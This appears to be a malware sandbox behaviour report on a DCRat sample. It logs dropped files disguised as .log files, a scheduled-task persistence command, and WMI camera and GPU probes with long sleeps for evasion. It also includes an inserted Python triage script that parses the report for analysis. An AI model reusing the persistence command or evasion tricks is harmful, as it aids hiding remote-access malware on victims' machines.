Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\wKKCkQsU.log
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\BXyiPEuJ.log
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | File created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\lzmaextractor.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\lealJKxT.log
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\XaQepXPR.log
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\gaqNoVOB.log
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\jUtdfVsr.log
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | File created: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSI4DD5.tmp
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\LMwQZDoR.log
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\pAGUOyAM.log
Source: C:\Users\user\Desktop\gorkmTnChA.exe | File created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSI4A94.tmp
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\GKQhrBJx.log
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\YTLXwDIz.log
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\SFtfhzmX.log
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSI4C8A.tmp
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | File created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\ShortcutFlags.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSI4D85.tmp
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\xqfrsuNN.log
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\zbqSUreo.log
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\SEFybwug.log
Source: C:\Users\user\Desktop\gorkmTnChA.exe | File created: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\vSFbtVsB.log
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | File created: C:\Users\user\AppData\Local\Temp\MSI43FC.tmp
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\hwUMgwXg.log
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSI4B03.tmp
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\vlAbNuev.log
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\lKQdHBzT.log
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSI4A36.tmp
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\jyGvCfcb.log
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\aHPfiQDx.log
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\ZkmfqpvS.log
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\nBMUCfZn.log
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\dYYVtYJg.log
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\AOGsABiv.log
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | File created: C:\Users\user\AppData\Local\Temp\MSI447A.tmp
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\Default\Favorites\ApplicationFrameHost.exe
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\XgvwQtEs.log
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\jLWdviZu.log
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\JrPikvxc.log
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\ClgJzaDG.log
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSI4969.tmp
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\uAoBkxMT.log

Boot Survival

Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe Process information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeMemory allocated: D80000 memory reserve | memory write watch
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeMemory allocated: 1AB40000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeMemory allocated: 12F0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeMemory allocated: 1AF80000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeMemory allocated: 1340000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeMemory allocated: 1B060000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeMemory allocated: 1890000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeMemory allocated: 1B340000 memory reserve | memory write watch
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 600000
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 599874
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 598859
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 598718
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 598499
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 598375
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 3600000
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 597421
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 597250
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 597103
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596999
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596859
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596733
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596623
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 300000
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596515
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596406
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596296
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596187
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 596078
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595968
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595859
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595749
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595640
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595530
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595421
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 595289
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594630
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594499
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594385
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594281
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594168
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 594062
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593949
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593843
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593734
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593624
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593487
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593359
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593249
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593140
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 593031
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592921
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592812
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592702
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592540
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592427
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 592046
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 591878
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 591732
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 591624
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 591515
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeThread delayed: delay time: 922337203685477
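The WMI hardware queries and the long thread delays above are the two anti-analysis indicators a triage analyst pulls out of a report like this one first. The following Python script is an added example (not Joe Sandbox code and not part of this report): it parses the flattened "Source: <process><signature>: <detail>" lines exactly as they appear on this page, counts the WMI classes queried, separates "infinite" sleeps (922337203685477 ms is TimeSpan.MaxValue in milliseconds) from long finite ones, and lists dropped PE files written under a non-executable extension. The process paths and the SAMPLE_LINES list are a constructed subset of the entries shown on this page; the 30000 ms threshold and the set of "expected" PE extensions are assumptions chosen for illustration.

```python
"""Triage of Joe Sandbox behaviour lines (added example; not part of the report)."""
import ntpath
import re
from collections import Counter, defaultdict

# .NET TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks / 10000): the value
# the sandbox records when a thread sleeps "forever".
INFINITE_SLEEP_MS = 922337203685477
LONG_SLEEP_MS = 30_000            # assumption: single finite delays >= this are flagged
VM_PROBE_CLASSES = {"win32_pnpentity", "win32_videocontroller"}  # hardware fingerprint probes
PE_EXTS = {".exe", ".dll", ".sys", ".tmp"}  # assumption: .tmp covers MSI staging files

# Extraction glued the process path to the signature name, so anchor on '.exe'.
WMI_RE = re.compile(r"^Source: (?P<proc>.+?\.exe)WMI Queries: .*?: (?P<query>SELECT\b.+?)(?:Jump to behavior)?$")
DELAY_RE = re.compile(r"^Source: (?P<proc>.+?\.exe)Thread delayed: delay time: (?P<ms>\d+)")
DROP_RE = re.compile(r"^Source: (?P<proc>.+?\.exe)Dropped PE file which has not been started: (?P<path>.+?)(?:Jump to dropped file)?$")
CLASS_RE = re.compile(r"\bFROM\s+(\w+)", re.IGNORECASE)

KADP = r"C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe"
WEBDRIVER = r"C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe"
INSTALLER = r"C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe"

# Constructed subset of the report's lines, including the 'Jump to ...' link text
# that HTML extraction leaves glued to some entries.
SAMPLE_LINES = [
    "Source: " + KADP + r"WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')",
    "Source: " + KADP + r"WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')",
    "Source: " + KADP + r"WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController",
    "Source: " + WEBDRIVER + "Thread delayed: delay time: 922337203685477Jump to behavior",
    "Source: " + KADP + "Thread delayed: delay time: 922337203685477",
    "Source: " + KADP + "Thread delayed: delay time: 600000",
    "Source: " + KADP + "Thread delayed: delay time: 599874",
    "Source: " + KADP + r"Dropped PE file which has not been started: C:\Users\user\Desktop\OfhhMrNQ.logJump to dropped file",
    "Source: " + INSTALLER + r"Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI47C9.tmpJump to dropped file",
    "Source: " + WEBDRIVER + r"Dropped PE file which has not been started: C:\Users\user\Desktop\lNILRSep.logJump to dropped file",
]


def triage(lines):
    """Fold behaviour lines into per-report counters; unknown line types are ignored."""
    report = {
        "wmi_classes": Counter(),          # WMI class -> number of queries
        "vm_probe_procs": set(),           # processes that ran a VM-fingerprint query
        "sleep_ms_by_proc": defaultdict(int),  # sum of finite delays per process
        "infinite_sleepers": set(),        # processes that parked a thread forever
        "long_sleeps": 0,                  # finite delays at or above LONG_SLEEP_MS
        "dropped_pe": [],                  # (process, path) of PE files never executed
    }
    for raw in lines:
        line = raw.strip()
        if (m := WMI_RE.match(line)):
            cls = CLASS_RE.search(m["query"])
            if cls:
                report["wmi_classes"][cls.group(1)] += 1
                if cls.group(1).lower() in VM_PROBE_CLASSES:
                    report["vm_probe_procs"].add(m["proc"])
        elif (m := DELAY_RE.match(line)):
            ms = int(m["ms"])
            if ms >= INFINITE_SLEEP_MS:
                report["infinite_sleepers"].add(m["proc"])
            else:
                report["sleep_ms_by_proc"][m["proc"]] += ms
                if ms >= LONG_SLEEP_MS:
                    report["long_sleeps"] += 1
        elif (m := DROP_RE.match(line)):
            report["dropped_pe"].append((m["proc"], m["path"]))
    return report


def masquerading_drops(report):
    """Dropped PE files whose extension is not one a PE is expected to carry."""
    return [path for _, path in report["dropped_pe"]
            if ntpath.splitext(path)[1].lower() not in PE_EXTS]


if __name__ == "__main__":
    r = triage(SAMPLE_LINES)
    print("WMI classes:", dict(r["wmi_classes"]))
    print("VM-probe processes:", sorted(r["vm_probe_procs"]))
    print("infinite sleepers:", sorted(r["infinite_sleepers"]))
    print("long finite sleeps:", r["long_sleeps"], dict(r["sleep_ms_by_proc"]))
    print("PE files under non-PE extensions:", masquerading_drops(r))
```

The per-process split matters: here the two KAdpNCgonFhCnlBRasdZerWl.exe copies and webDriverintoDll.exe each park a thread with an infinite sleep, while the finite ten-minute delays come from a single thread (TID 1448 in the sleep-time lines below), which is the pattern of a beacon loop rather than a one-off stall.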
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWindow / User API: threadDelayed 4080
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWindow / User API: threadDelayed 5652
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\OfhhMrNQ.log
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeDropped PE file which has not been started: C:\Users\user\Desktop\UvPgJftz.log
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI47C9.tmp
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\lNILRSep.log
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI46ED.tmp
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI44B9.tmp
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeDropped PE file which has not been started: C:\Users\user\Desktop\UplOiJFY.log
